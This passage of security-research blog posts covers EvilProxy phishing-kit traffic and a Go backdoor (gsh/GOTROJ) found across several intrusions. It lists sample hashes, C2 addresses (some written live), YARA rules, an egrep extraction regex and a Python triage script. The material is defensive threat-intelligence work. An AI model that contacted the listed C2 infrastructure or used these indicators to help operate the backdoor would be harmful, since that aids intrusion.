data-original-width="570" height="108" src="https://blogger.googleusercontent.com/img/a/AVvXsEjwIL7KYTY9HBZnfpf8Q0qZ_ao6UR9TknDV8WpxPzci3UrpRfqpIC47z1q4TQu6FgURExkEU7txg_wXFscZExymcwh0K9mmSRsHiUMd5ZZt-l6fh-YJ5SNeErDw-rK_u50eOhTQe8_DcJA8THKlj_6LE4uqgnfb3EZ_di2WZZXvMNaJXhtftBxDTbBV" width="320" /></a></div><br />Essentially, the page is a title element containing Wait..., a script element holding a big JS block, and a second script element of the form let randomvar = base64.<p></p><p>A regex rule applied to HTTP traffic might be able to find this, maybe?</p><h3 style="text-align: left;">HTTP Requests:</h3><p>While doing research/queries, I found a website that was not doing any redirection and is possibly EvilProxy (getting 444 on one of the pages related to this).</p><p>Traffic to this site shows the following POST request after fingerprinting:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEify2hnKR8ckZVmMqEK4OOExPscWR_I7C2kVDDT2yydNkVSEV18xLM2Uya-QwN245kIgd3SjrkgavKbsoPtQeLxKXKpK6g_gINQ91PKqe9E1SqiMt2nfvdRH0r4AGn3KYYAaJ5qdlf1xXnMYOiOnHahB8QsZVsBnkmyYjC-UN-WM7Bco9bmN3QzC0lx" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="762" data-original-width="2560" height="229" src="https://blogger.googleusercontent.com/img/a/AVvXsEify2hnKR8ckZVmMqEK4OOExPscWR_I7C2kVDDT2yydNkVSEV18xLM2Uya-QwN245kIgd3SjrkgavKbsoPtQeLxKXKpK6g_gINQ91PKqe9E1SqiMt2nfvdRH0r4AGn3KYYAaJ5qdlf1xXnMYOiOnHahB8QsZVsBnkmyYjC-UN-WM7Bco9bmN3QzC0lx=w770-h229" width="770" /></a></div><br />The response looks like this:</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiX6w_9WrWr2BkLzovCoPKYR_JtBXkJrVI4iTmA5MTIL0Jb0cJMbjml4zXot9jul1fOPtuJYgMDZVjK4qztXcCYDpUubG75dPJJsAqosOCc7mZGvtG7eXu0B1FTWwOfHVoBFmbBU1XJrQ9DTX8V6A74yDGLSPiC5iIhtI8Eld7PBdXsr0TZro2PhtM9" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="440" data-original-width="594" height="237" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEiX6w_9WrWr2BkLzovCoPKYR_JtBXkJrVI4iTmA5MTIL0Jb0cJMbjml4zXot9jul1fOPtuJYgMDZVjK4qztXcCYDpUubG75dPJJsAqosOCc7mZGvtG7eXu0B1FTWwOfHVoBFmbBU1XJrQ9DTX8V6A74yDGLSPiC5iIhtI8Eld7PBdXsr0TZro2PhtM9" width="320" /></a></div><br />Once that's done, a cookie with cookiekey:cookievalue gets added to the session.</div><div><br /></div><div>There is also a websocket connection/heartbeat, which doesn't happen with the real Microsoft login page:</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiQW_fV3ZqnPwuM4mU9zDMoOYIo_4JVFh9FrR4Y0SKrAcM3CvWHiF4vWQGrit2qL6I7COeiZ6EHFv2qAoN3D-T_dkDjUsi1y4IpvaT8CdkwyXlKyNEwymK6iXz-OyBiYdwYLcNqeTM8Np4fuZg0rJ1aVdNnMh_wsu2mjNhQoJONFcL8N7GsUQG28A8q" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="470" data-original-width="418" height="240" src="https://blogger.googleusercontent.com/img/a/AVvXsEiQW_fV3ZqnPwuM4mU9zDMoOYIo_4JVFh9FrR4Y0SKrAcM3CvWHiF4vWQGrit2qL6I7COeiZ6EHFv2qAoN3D-T_dkDjUsi1y4IpvaT8CdkwyXlKyNEwymK6iXz-OyBiYdwYLcNqeTM8Np4fuZg0rJ1aVdNnMh_wsu2mjNhQoJONFcL8N7GsUQG28A8q" width="213" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj7p25q6QNVz9a6QUgzKjpYkW1pqLMPoRoH9XsYA1gLqZtjDNhJvqh6BQa5TBHcyUP3y2DZ6X-cET_X75QBnUTawLNQ1NeV4CxRxrHQmTQwfD7qyqwxJF-C6uDuLH0qbgXJTQAUPACZCftAw_WOuRIm0ZZmfEQ-1waw-NFpp6EYcLUgS7MDri5aGWn8" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="786" data-original-width="834" height="336" src="https://blogger.googleusercontent.com/img/a/AVvXsEj7p25q6QNVz9a6QUgzKjpYkW1pqLMPoRoH9XsYA1gLqZtjDNhJvqh6BQa5TBHcyUP3y2DZ6X-cET_X75QBnUTawLNQ1NeV4CxRxrHQmTQwfD7qyqwxJF-C6uDuLH0qbgXJTQAUPACZCftAw_WOuRIm0ZZmfEQ-1waw-NFpp6EYcLUgS7MDri5aGWn8=w357-h336" width="357" /></a></div><br /><br /><p></p><p>The requests for sending username/password look identical for the 
phishing site and the normal login site.</p><p>The websocket, the fingerprinting POST, and the response with cookies might be something that can be detected on the wire if TLS/SSL interception and Suricata/Zeek monitoring are in place.</p><p><br /></p><h3 style="text-align: left;">Conclusion:</h3><p>EvilProxy offers a lot of customization, so a lot of the stuff mentioned above can be modified by the user, but some users might just use the default settings. </p><p>Without a lot of direct attribution to EvilProxy and research out there, a lot of the stuff above is just an educated guess with the information I have available. I could be wrong about a lot of things. These are just notes and not anything conclusive.</p><h2 style="text-align: left;"><b>Links:</b></h2><p><a href="https://resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web">https://resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web</a></p><p><a href="https://twitter.com/JeffreyAppel7/status/1591911982848172032/photo/1">https://twitter.com/JeffreyAppel7/status/1591911982848172032/photo/1</a></p><p><a href="https://www.microsoft.com/en-us/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/">https://www.microsoft.com/en-us/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/</a></p><p><a href="https://github.com/kgretzky/evilginx2">https://github.com/kgretzky/evilginx2</a></p><p><a href="https://github.com/drk1wi/Modlishka">https://github.com/drk1wi/Modlishka</a></p><p><a href="https://github.com/muraenateam/muraena">https://github.com/muraenateam/muraena</a></p><p><br /></p><p><b><br /></b></p></div></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-25392070837454202342022-10-17T08:11:00.006-07:002022-10-17T08:12:49.173-07:00Researching golang malware and how I hate 
security industry naming conventions - Part 1<p> </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjCacg8gei_TGJ0rWC9cFDLmBEhe8kudSjrikgKNiq9LgHgG0r1RZYbYmBXcnp0R0l7-GVKXPZ31-swOD2ZIxwjuY2Kr4OrDMqtDNdFq12nYhLzcoqMSj0rxv2PkRj7Bvtir1gZPT45Dd90CtMliYG_fRvEsTzmJc9KuvHDFYG6v3bMO4_1TQSt-KhL" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="768" data-original-width="1024" height="300" src="https://blogger.googleusercontent.com/img/a/AVvXsEjCacg8gei_TGJ0rWC9cFDLmBEhe8kudSjrikgKNiq9LgHgG0r1RZYbYmBXcnp0R0l7-GVKXPZ31-swOD2ZIxwjuY2Kr4OrDMqtDNdFq12nYhLzcoqMSj0rxv2PkRj7Bvtir1gZPT45Dd90CtMliYG_fRvEsTzmJc9KuvHDFYG6v3bMO4_1TQSt-KhL=w400-h300" width="400" /></a></div><br /><p></p>While doing some research on the use of golang in malware, I came across this golang sample here: <a href="https://www.virustotal.com/gui/file/020f6b3e045fa6b968226a8f2b2800dc55c65e842607d04d68b47ef4d18b0eee/detection">https://www.virustotal.com/gui/file/020f6b3e045fa6b968226a8f2b2800dc55c65e842607d04d68b47ef4d18b0eee/detection </a><br />At the time of writing this, it has 3/72 detections.<br /><br />It's named winnta.exe<br />MD5 7e17c9e4ebe61e43966e9f65e334727e<br />SHA-1 2172901d2a13304dd53a83e518fd5be84ed9ec08<br />SHA-256 020f6b3e045fa6b968226a8f2b2800dc55c65e842607d04d68b47ef4d18b0eee<br /><br />Here are the results for yara scan: <a href="https://yaraify.abuse.ch/sample/020f6b3e045fa6b968226a8f2b2800dc55c65e842607d04d68b47ef4d18b0eee/">https://yaraify.abuse.ch/sample/020f6b3e045fa6b968226a8f2b2800dc55c65e842607d04d68b47ef4d18b0eee/</a><br /><br />It connects to 195.149.87[.]87:443 (<a href="https://www.virustotal.com/gui/ip-address/195.149.87.87/relations">https://www.virustotal.com/gui/ip-address/195.149.87.87/relations</a> )<br /><br />The data above doesn't really tell us much about the sample. 
<br /><br />Running strings on the sample is kinda interesting, it shows the following:<br />-ldflags="-s -w -extldflags '-static' -X main.name=WindowsNTApp -X main.addr=195.149.87.87:443 -X main.service=WindowsNTApp"<br /><br />Also there are a bunch of references to go files and code in this directory: "/home/builder18g/goroot/" for example:<br />/home/builder18g/goroot/src/c/gsh/main/main.go<br />/home/builder18g/goroot/src/c/gsh/main/windows.go<br /><br />Looking for 'main.' shows the following:<br />runtime.main.func1<br />runtime.main.func2<br />main.main<br />main.(*winService).Stop<br />main.(*winService).Execute<br />main.(*winService).Start<br />main.(*winService).Execute.func1<br />main.startInteractive<br />main.Start<br /><br />At this point, assumption is this is some kinda backdoor.<br /><br />Researching the C2 IP, I found this:<br /><a href="https://raw.githubusercontent.com/stamparm/maltrail/master/trails/static/malware/apt_unc961.txt">https://raw.githubusercontent.com/stamparm/maltrail/master/trails/static/malware/apt_unc961.txt<br /></a><a href="https://otx.alienvault.com/pulse/6244606893ddbc9a6a5bbdeb">https://otx.alienvault.com/pulse/6244606893ddbc9a6a5bbdeb<br /></a><a href="https://www.mandiant.com/resources/blog/mobileiron-log4shell-exploitation">https://www.mandiant.com/resources/blog/mobileiron-log4shell-exploitation<br /></a><br />Here's what Mandiant has to say about this:<br />"UNC961 deployed two previously unobserved backdoors: HOLEDOOR and DARKDOOR. HOLEDOOR is written in C, whereas DARKDOOR is written in Go."<br /><br />"DARKDOOR is a backdoor written in Go that is highly modular in design. It supports communication over TLS and HTTP. 
It has capabilities to execute arbitrary code and list running processes."<br /><br />I continued to do more research to see what else I can find out about this sample doing any reverse engineering.<br /><br />Searching for winnta.exe results in a paper from SentinelOne (<a href="https://www.sentinelone.com/wp-content/uploads/2021/05/Watchtower_2021_May_White.pdf">https://www.sentinelone.com/wp-content/uploads/2021/05/Watchtower_2021_May_White.pdf</a>)<br /><br />They mention the backdoor under section "Mercenary APT Groups Targeting the Financial Services Industry"<br /><br />Here's what they had to say about it:<br />File: winntaWindows EXE written in golang that calls out to<br />45.76.236[.]136:443<br />Backdoor functionality<br />Potential name “gsh”<br /><br />File: main<br />Golang compiled EXE of same “gsh” family as mentioned<br />for winnta<br />Calls out to 198.199.104[.]97:443 and has backdoor<br />capabilities<br /><br />Under potential attribution section, they refer to an RSA report regarding Carbanak."Carbanak has been reported using a custom golang backdoor named GOTROJ. This backdoor<br />has code overlap and functionality similar to the “geodezine” backdoor discovered in the attacker’s toolkit. "<br /><br />The RSA paper "The Shadows of Ghosts" can be found here: <a href="https://www.netwitness.com/wp-content/uploads/2021/12/the-shadows-of-ghosts-carbanak-report.pdf">https://www.netwitness.com/wp-content/uploads/2021/12/the-shadows-of-ghosts-carbanak-report.pdf</a><br /><br />Here's a snippet about GOTROJ from the paper:<br />"On D+30, the attackers installed a Windows Trojan, written in Go, as a Windows<br />Service on one of the two primary Active Directory Domain Controllers. They<br />would move to utilizing the GOTROJ as their primary method of ingress for the<br />duration of the engagement. 
The GOTROJ Trojan communicated with C2 IP address 107.181.246.146 over TCP/443 for its remote access channel."<br /><br />I continued doing more research. I searched for the "WindowsNTApp" service, which turned up a CrowdStrike report on PROPHET SPIDER. The report is here: <a href="https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/">https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/</a><div><br />They also refer to the malware as GOTROJ. This is what they say:<br />"The adversary commonly creates Windows services, e.g. WindowsNTApp for GOTROJ, to establish persistence for downloaded malware."</div><div><br /></div><div>I finally searched for GOTROJ to see if there was anything else I could find. I only found one article (besides the ones I had already looked at): <a href="https://www.fortify24x7.com/2022/04/ragnarlocker-ransomware-iocs/">https://www.fortify24x7.com/2022/04/ragnarlocker-ransomware-iocs/</a>, where they found GOTROJ alongside a Ragnarlocker infection.</div><div><br /></div><div>I downloaded some of the samples to look at. 
I recommend this Ghidra extension: <a href="https://github.com/mooncat-greenpy/Ghidra_GolangAnalyzerExtension/releases/tag/1.1.0">https://github.com/mooncat-greenpy/Ghidra_GolangAnalyzerExtension/releases/tag/1.1.0</a></div><div><br /></div><div>The samples look similar and functions kinda look like this (different samples will have slightly different names and code):</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj4lWWGHwW021JKUsurrHt2dyM1vqilco7RwJ_jXEVirG3Fxzie6n6DN3MUPM7fyeYWFpzeOKGg0nKPvQbXgzNCoVkDo4A8U68hSa1ad7RaXISaZxMnFNUZ9iiq4gH6GI8YhjmxWRvIBmT2xWKBQbzheoGAM4ExVtN4mH-fAKvBn_aaj6pgEix5szB4" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="1002" data-original-width="820" height="640" src="https://blogger.googleusercontent.com/img/a/AVvXsEj4lWWGHwW021JKUsurrHt2dyM1vqilco7RwJ_jXEVirG3Fxzie6n6DN3MUPM7fyeYWFpzeOKGg0nKPvQbXgzNCoVkDo4A8U68hSa1ad7RaXISaZxMnFNUZ9iiq4gH6GI8YhjmxWRvIBmT2xWKBQbzheoGAM4ExVtN4mH-fAKvBn_aaj6pgEix5szB4=w523-h640" width="523" /></a></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhwQYfbdPRufyuBHe4g2I0kbN0COU-n1GUjd03dc8qjgl-rDu_D6uj2vnFu9StwUx7tFxIidqyb4Q6y5Q4U9R6FRC4G3jzZ0oLsKDprEQBzLIilrNzwLK1oEeRZWL0HFACZImxRsTslPqeOTqBZbOPwU4nm7nKIimmimrLC5ABwjnPPJA2NtyGUXmKL" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="1268" data-original-width="944" height="640" src="https://blogger.googleusercontent.com/img/a/AVvXsEhwQYfbdPRufyuBHe4g2I0kbN0COU-n1GUjd03dc8qjgl-rDu_D6uj2vnFu9StwUx7tFxIidqyb4Q6y5Q4U9R6FRC4G3jzZ0oLsKDprEQBzLIilrNzwLK1oEeRZWL0HFACZImxRsTslPqeOTqBZbOPwU4nm7nKIimmimrLC5ABwjnPPJA2NtyGUXmKL=w477-h640" width="477" /></a></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEiOW08agJ6-tAV0_HfZzJj0H4C9zyFvMtgqJ5mJlJBtEzJHQYZtdY7DSmj0SHnQ4L28C_dxQKBI20mwhEplSsAP7SHtQtAOYbmwvasS88xhpWNQ9_9P26n1XgoZW5M6NqUrSh8Gvvwnn7oV6q1f6R_xqxmq72icCaR0WT04_tepjzpa2MpUkP4Y-3TX" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="1164" data-original-width="926" height="640" src="https://blogger.googleusercontent.com/img/a/AVvXsEiOW08agJ6-tAV0_HfZzJj0H4C9zyFvMtgqJ5mJlJBtEzJHQYZtdY7DSmj0SHnQ4L28C_dxQKBI20mwhEplSsAP7SHtQtAOYbmwvasS88xhpWNQ9_9P26n1XgoZW5M6NqUrSh8Gvvwnn7oV6q1f6R_xqxmq72icCaR0WT04_tepjzpa2MpUkP4Y-3TX=w509-h640" width="509" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjciSXz_946EHIDZiZK5RrJ-H4LyEkLonkEDiz60__0-ZtQzRINhJVLc423Jf_n8u812_nlOm3bxnw5XYVDkycgZWE7k1JTxzIjDE2kF3VqMeITQIgjepjQ8HG373yhTlgF4thdDZo-ZwIKw1g8MaQ21Ci8SgtJSY_jXcBwPqTnYVvdHKtPzbHB2w0y" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="454" data-original-width="978" height="298" src="https://blogger.googleusercontent.com/img/a/AVvXsEjciSXz_946EHIDZiZK5RrJ-H4LyEkLonkEDiz60__0-ZtQzRINhJVLc423Jf_n8u812_nlOm3bxnw5XYVDkycgZWE7k1JTxzIjDE2kF3VqMeITQIgjepjQ8HG373yhTlgF4thdDZo-ZwIKw1g8MaQ21Ci8SgtJSY_jXcBwPqTnYVvdHKtPzbHB2w0y=w640-h298" width="640" /></a></div><br /><br /></div><div style="text-align: left;">The golang build path's embedded inside the samples are different, likely because each sample was probably compiled on different hosts likely by different people. 
Interestingly, the sample I started with is the only sample that has the build string in it with ldflags.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Other reports have already analyzed the capabilities of this golang backdoor, but you can see from the function names what it can do as well.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Part 1: <a href="https://www.boredhackerblog.info/2022/10/researching-golang-malware-and-how-i.html">https://www.boredhackerblog.info/2022/10/researching-golang-malware-and-how-i.html</a></div><div style="text-align: left;">Part 2: <a href="https://www.boredhackerblog.info/2022/10/researching-golang-malware-and-how-i_17.html">https://www.boredhackerblog.info/2022/10/researching-golang-malware-and-how-i_17.html</a></div></div></div><hr /><h1>Researching golang malware and how I hate security industry naming conventions - Part 2</h1><p>Published 2022-10-17</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi38UN9r00fTukaF1pjS-RuRDbAlD-IOf-0cBn2dH2Mez85uBM7AuQYIxhoDu4cfMR1dnprpP4gOAXpXNhjX4lkgbyRrJjGk3NM8v1EoH1jRxrf0jX0h8B6sTR0t9NHpevvnASsN6ZswKZsJ6LGKAVT4WXZ9o90MNMfYT4PK3zR28gq59BIddX07Gmw" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="300" data-original-width="400" height="300" src="https://blogger.googleusercontent.com/img/a/AVvXsEi38UN9r00fTukaF1pjS-RuRDbAlD-IOf-0cBn2dH2Mez85uBM7AuQYIxhoDu4cfMR1dnprpP4gOAXpXNhjX4lkgbyRrJjGk3NM8v1EoH1jRxrf0jX0h8B6sTR0t9NHpevvnASsN6ZswKZsJ6LGKAVT4WXZ9o90MNMfYT4PK3zR28gq59BIddX07Gmw=w400-h300" width="400" /></a></div><br /><p>I did some string searches in Hybrid-Analysis as well to look for more files. (Thanks Hybrid-Analysis for a researcher account!) 
I finally ended up with this YARA rule (I'll learn to write better rules one day):</p><pre>rule gsh_backdoor
{
    strings:
        $a = "startInteractive"
        $b = "main.winService"
        $c = "main.(*winService).Start"
    condition:
        ($a and $b and $c) and filesize < 6MB and filesize > 2MB
        and uint16(0) == 0x5A4D
}</pre><div><br /></div><div>Searching that on Hybrid-Analysis results in the following hashes:</div><div><div>57150938be45c4d9c742ab24c693acc14cc071d23b088a1facc2a7512af89414</div><div>b63ea16d5187c1fa52a8a20c3fd7b407033bcd4142addb1ce91923d6b2f19555</div><div>57a45d3010d74cbd089cacf23bc0f68eaa3fb8dc5479dbe8ed8e19004badfdb6</div><div>9d42c2b6a10866842cbb6ab455ee2c3108e79fecbffb72eaf13f05215a826765</div><div>95c6d0d4e619334b3d8adb5340198c420f78f937f3dc944bc12a2be7f73fb952</div><div>18077efa0c23e9370eb95ca6c5ece82bcf61e63505a87aea8cb6a14d15500a8c</div><div>55320dcb7e9e96d2723176c22483a81d47887c4c6ddf063dbf72b3bea5b279e3</div></div><br />You can also run strings on the files and extract C2 information with egrep:<pre>strings -f * | egrep '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?):([0-9]{1,5})'</pre>(The port group is written as [0-9]{1,5} here: \d is not part of egrep's extended regex syntax, and GNU grep treats it as a literal d, so a (\d{0,5}) group would accept any "ip:" with no port at all.)<div><br /></div><div><div>18077efa0c23e9370eb95ca6c5ece82bcf61e63505a87aea8cb6a14d15500a8c.bin.sample: 142.93.213[.]221:21</div><div>55320dcb7e9e96d2723176c22483a81d47887c4c6ddf063dbf72b3bea5b279e3.bin.sample: 107.181.246[.]146:443</div><div>57a45d3010d74cbd089cacf23bc0f68eaa3fb8dc5479dbe8ed8e19004badfdb6.bin.sample: 198.199.104[.]97:443</div><div>95c6d0d4e619334b3d8adb5340198c420f78f937f3dc944bc12a2be7f73fb952.bin.sample: 64.227.88[.]98:443</div><div>9d42c2b6a10866842cbb6ab455ee2c3108e79fecbffb72eaf13f05215a826765.bin.sample: 107.181.246[.]146:443</div><div>b63ea16d5187c1fa52a8a20c3fd7b407033bcd4142addb1ce91923d6b2f19555.bin.sample: 
45.76.236[.]136:443</div><div>winnta.bin: 195.149.87[.]87:443</div></div><div><br /></div><div>One more thing I noticed while researching this is the mention of a "geodezine" backdoor. Some of its samples connect to the same C2 server as the golang backdoor. I haven't looked too much into it, but here's a rule:</div><div><br /></div><pre>rule geo_backdoor
{
    strings:
        $a = "geodezine"
        $b = "cmd.exe"
        $c = "URLDownloadToFilDeleteUrlCacheEn"
    condition:
        ($a and $b and $c) and filesize < 100KB and uint16(0) == 0x5A4D
}</pre><div><br /></div><div>And here are the hashes that show up on Hybrid-Analysis:</div><div><div>98647c242e5df8122929f4bbdc21495ef28038c64186b4cc8ec8d6e34b838d6a</div><div>51141d45e6257b0f4b15e98ceef00c18869e7958cddd1454385671c14c51492e</div></div><div><br /></div><div><br /></div><div><b>Summary of where this Golang malware shows up and timeline:</b></div><div><b>December 2017</b></div><div>The Shadows of Ghosts
Inside the response of a unique Carbanak intrusion</div><div>Filename: ctlmon.exe</div><div>Malware name: GOTROJ</div><div>C2: 107.181.246[.]146</div><div>Hashes:</div><div>450605b6761ff8dd025978f44724b11e0c5eadcc</div><div>08f527bef45cb001150ef12ad9ab91d1822bb9c7</div><div>7b27771de1a2540008758e9894bfe168f26bffa0</div><div>Attack involved exploitation of CVE-2017-5638</div><div><br /></div><div><a href="https://www.netwitness.com/wp-content/uploads/2021/12/the-shadows-of-ghosts-carbanak-report.pdf">https://www.netwitness.com/wp-content/uploads/2021/12/the-shadows-of-ghosts-carbanak-report.pdf</a></div><div><br /></div><div><b>May 2021</b></div><div>Mercenary APT Groups Targeting the Financial Services Industry</div><div>Filename: winnta / main</div><div>Malware name: GOTROJ-related / gsh</div><div>C2: 45.76.236[.]136, 198.199.104[.]97</div><div>"cyber mercenary attack targeting a major US-based financial services organization"</div><div><br /></div><div><a href="https://www.sentinelone.com/wp-content/uploads/2021/05/Watchtower_2021_May_White.pdf">https://www.sentinelone.com/wp-content/uploads/2021/05/Watchtower_2021_May_White.pdf</a></div><div><br /></div><div><b>August 2021</b></div><div>PROPHET SPIDER Exploits Oracle WebLogic to Facilitate Ransomware Activity</div><div>Filename: winnta</div><div>Malware name: GOTROJ</div><div>Hashes:</div><div>2b03806939d1171f063ba8d14c3b10622edb5732e4f78dc4fe3eac98b56e5d46</div><div>55320dcb7e9e96d2723176c22483a81d47887c4c6ddf063dbf72b3bea5b279e3</div><div>57150938be45c4d9c742ab24c693acc14cc071d23b088a1facc2a7512af89414</div><div>9d42c2b6a10866842cbb6ab455ee2c3108e79fecbffb72eaf13f05215a826765</div><div>exploitation of CVE-2020-14882 and CVE-2020-14750</div><div><br /></div><div><a href="https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/">https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/</a></div><div><br 
/></div><div><b>March 2022</b></div><div>Forged in Fire: A Survey of MobileIron Log4Shell Exploitation</div><div>Malware name: DARKDOOR</div><div>C2: 162.33.178[.]149, 195.149.87[.]87</div><div>Attributed to UNC961 and related to exploitation of Log4j in Horizon and MobileIron</div><div><br /></div><div><a href="https://www.mandiant.com/resources/blog/mobileiron-log4shell-exploitation">https://www.mandiant.com/resources/blog/mobileiron-log4shell-exploitation</a></div><div><br /></div><div><b>April 2022</b></div><div>Ragnarlocker Ransomware IOCs</div><div>Filename: ctlmon.exe</div><div>Malware name: GOTROJ</div><div>C2: 45.63.89[.]250</div><div>Related to breach involving Ragnarlocker according to the post</div><div><br /></div><div><a href="https://www.fortify24x7.com/2022/04/ragnarlocker-ransomware-iocs/">https://www.fortify24x7.com/2022/04/ragnarlocker-ransomware-iocs/</a></div><div><br /></div><div><b>September 2022</b></div><div>This is the sample that I started out my research with</div><div>Filename: winnta.exe</div><div>Hash: 020f6b3e045fa6b968226a8f2b2800dc55c65e842607d04d68b47ef4d18b0eee</div><div>C2: 195.149.87[.]87</div><div>I just found the sample. I'm not sure what campaign it's related to or any other details. The C2 matches the Mandiant report though.</div><div><br /></div><div>You should be able to pivot from C2 to sample hash or sample hash to C2 using VirusTotal. Some vendors didn't supply C2s or hashes.</div><div><br /></div><div>As far as I know, I have not seen any of these samples running and successfully connecting to C2 in any of the public sandboxes. I haven't seen results in Shodan or Censys that show the C2 port open even with historical search for the September 2022 sample.</div><div><br /></div><div>There may be more samples on VirusTotal but I'm doing this independently and don't have access to VT.</div><div><br /></div><div>I'm not a CTI person. To me this looks like a golang backdoor used by multiple actors. 
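The two extraction steps used in this post and the one above it, reading the -X main.addr=HOST:PORT linker flag that strings exposed in one sample and grepping every sample for an IPv4:port pair, as an added Python example. This is my code, not the blog's scripts or any vendor's tooling. extract_strings is a small stand-in for strings(1); octet and port ranges are checked in code instead of with the long egrep alternation; results are defanged for reporting. It runs on a constructed byte blob with RFC 5737 placeholder addresses and a placeholder build path, not on the samples or IOCs listed above; pass real file bytes to triage() to use it on a sample.

```python
"""Pull C2 candidates out of the printable strings of a Go binary.

Added example, not code from the blog or from any vendor report it cites.
It automates two things the posts do by hand: reading the
`-X main.addr=HOST:PORT` linker flag that `strings` exposed in one sample,
and grepping every sample for an IPv4:port pair. The input below is a
constructed byte blob standing in for a binary, with RFC 5737 placeholder
addresses; pass real file bytes to triage() to use it on a sample.
"""
import re
from typing import Dict, List

# Go's linker -X flag looks like `-X importpath.var=value`; the sample in the
# post carries main.name, main.addr and main.service this way.
_LDFLAG_X = re.compile(r"-X\s+([\w./]+)=(\S+)")

# IPv4:port candidate; octet and port range checks are done in code below
# instead of with the long alternation used in the egrep one-liner.
_IP_PORT = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})(?!\d)")


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Return runs of at least min_len printable ASCII bytes, like strings(1)."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pat.finditer(data)]


def parse_ldflags(strings: List[str]) -> Dict[str, str]:
    """Map every `-X pkg.var=value` seen in the strings to {pkg.var: value}."""
    found: Dict[str, str] = {}
    for s in strings:
        for var, value in _LDFLAG_X.findall(s):
            found[var] = value.strip("'\"")
    return found


def _valid_ip_port(ip: str, port: str) -> bool:
    """Reject octets above 255 and ports outside 1-65535."""
    return all(int(o) <= 255 for o in ip.split(".")) and 1 <= int(port) <= 65535


def find_ip_ports(strings: List[str]) -> List[str]:
    """Unique 'ip:port' pairs in first-seen order, invalid ones dropped."""
    seen: List[str] = []
    for s in strings:
        for ip, port in _IP_PORT.findall(s):
            pair = f"{ip}:{port}"
            if _valid_ip_port(ip, port) and pair not in seen:
                seen.append(pair)
    return seen


def defang(ip_port: str) -> str:
    """Write 1.2.3.4:443 as 1.2.3[.]4:443 so it is not clickable in a report."""
    ip, port = ip_port.rsplit(":", 1)
    head, last = ip.rsplit(".", 1)
    return f"{head}[.]{last}:{port}"


def triage(data: bytes) -> dict:
    """strings -> ldflags -> defanged ip:port candidates, in one call."""
    strs = extract_strings(data)
    flags = parse_ldflags(strs)
    return {
        "ldflags": flags,
        "service_name": flags.get("main.service"),
        "c2_candidates": [defang(p) for p in find_ip_ports(strs)],
    }


# Constructed stand-in for a binary: junk bytes around the kinds of strings
# the post quotes. Addresses are documentation ranges, not real IOCs.
SAMPLE = (
    b"\x00\x01MZ\x90\x00"
    b"-ldflags=\"-s -w -extldflags '-static' -X main.name=ExampleApp "
    b"-X main.addr=203.0.113.10:443 -X main.service=ExampleApp\"\x00\x00"
    b"/home/builder/goroot/src/c/gsh/main/main.go\x00"
    b"main.(*winService).Start\x00"
    b"999.1.1.1:80\x00"                # octet out of range: dropped
    b"198.51.100.7:65536\x00"          # port out of range: dropped
    b"version 1.2.3.4:21 build\x00"    # well formed: kept
)

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

Anything that matches the IPv4:port shape is only a candidate: version strings and loopback addresses will show up too, which is why the output is a list to review rather than an IOC feed, and why the ldflags value (when a sample carries one) is the higher-confidence pivot.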
